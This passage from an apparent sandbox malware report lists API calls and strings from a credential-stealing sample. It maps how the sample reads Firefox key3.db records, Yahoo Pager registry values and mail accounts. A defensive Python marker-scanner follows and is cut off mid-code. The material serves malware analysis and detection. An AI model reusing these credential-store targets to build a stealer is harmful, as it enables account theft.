                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                              • String ID: ACD
                                                                                                              • API String ID: 1886237854-620537770
                                                                                                              • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                              • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                              • String ID: caption$dialog_%d
                                                                                                              • API String ID: 2923679083-4161923789
                                                                                                              • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                              • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                              • memset.MSVCRT ref: 00410246
                                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                              • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 3974772901-0
                                                                                                              • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                              • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                              APIs
                                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 577244452-0
                                                                                                              • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                              • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                                              • String ID: imap$pop3$smtp
                                                                                                              • API String ID: 2025310588-821077329
                                                                                                              • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                              • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,771B0A60), ref: 00408EBE
                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408E31
                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                              • API String ID: 2726666094-3614832568
                                                                                                              • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                              • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                              APIs
                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                              Similarity
                                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 2014771361-0
                                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$memcpy
                                                                                                              • String ID: global-salt$password-check
                                                                                                              • API String ID: 231171946-3927197501
                                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                              • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 438689982-0
                                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                              • String ID: Personalities
                                                                                                              • API String ID: 2103853322-4287407858
                                                                                                              • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                              • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                              • API String ID: 1830152886-1703613266
                                                                                                              • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                              • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: winRead
                                                                                                              • API String ID: 1297977491-2759563040
                                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044955B
                                                                                                              • memset.MSVCRT ref: 0044956B
                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                              APIs
                                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                              • String ID:
                                                                                                              • API String ID: 4247780290-0
                                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                              APIs
                                                                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                                              • String ID: smtp
                                                                                                              • API String ID: 2625860049-60245459
                                                                                                              • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                              • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
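The function listings above expose the string constants the unpacked Remcos module compares against when it harvests credentials: memcmp calls of length 0x0E and 0x0B against "password-check" and "global-salt" (the two entries of a legacy Firefox/NSS key3.db master-password record), the Software\Yahoo\Pager registry key with its "Yahoo! User ID" and "EOptions string" values, and the "smtp" account-type string in the mail-credential routine. The following triage helper is an added editor example, not part of the Joe Sandbox report and not code from the sample: it scans a raw memory-dump buffer for exactly those markers and reports their offsets, and it checks that the memcmp length arguments seen in the listing cover the whole marker. The labels attached to each marker are the editor's interpretation; the sample buffer is constructed and is not real dump data.

```python
# Added triage helper (not part of the Joe Sandbox report or of the sample):
# scans a raw memory-dump buffer for the credential-store markers that the
# function listings above compare against, and reports where each one lands.
from __future__ import annotations

import re

# Markers taken from the report's own API/String listings. The labels are the
# editor's interpretation; the bytes are exactly what the binary compares.
CREDENTIAL_MARKERS: dict[str, bytes] = {
    # memcmp(..., "password-check", 0x0E) / memcmp(..., "global-salt", 0x0B):
    # the two entries of a legacy Firefox/NSS key3.db master-password record
    "firefox_key3_password_check": b"password-check",
    "firefox_key3_global_salt": b"global-salt",
    # RegOpenKeyExA / RegQueryValueExA targets for Yahoo Messenger credentials
    "yahoo_pager_key": b"Software\\Yahoo\\Pager",
    "yahoo_user_id_value": b"Yahoo! User ID",
    "yahoo_eoptions_value": b"EOptions string",
    # account-type string copied by the mail-credential routine (_mbscpy)
    "smtp_account_type": b"smtp",
}


def scan_credential_markers(buf: bytes) -> dict[str, list[int]]:
    """Return {label: [offset, ...]} for every marker present in buf.

    Offsets are byte offsets into buf; a label is absent when its marker does
    not occur. Matching is byte-exact and case-sensitive, because memcmp is.
    """
    hits: dict[str, list[int]] = {}
    for label, needle in CREDENTIAL_MARKERS.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), buf)]
        if offsets:
            hits[label] = offsets
    return hits


def memcmp_length_matches(needle: bytes, length_arg: int) -> bool:
    """True when the memcmp length argument from the listing equals the marker
    length, i.e. the comparison covers the whole marker and nothing more."""
    return len(needle) == length_arg


# Constructed sample "dump": padding bytes around the markers, standing in for
# a process memory region. This is NOT data from the analysed sample.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"global-salt\x00"                        # offset 16
    + b"\x90" * 8
    + b"password-check\x00"                     # offset 36
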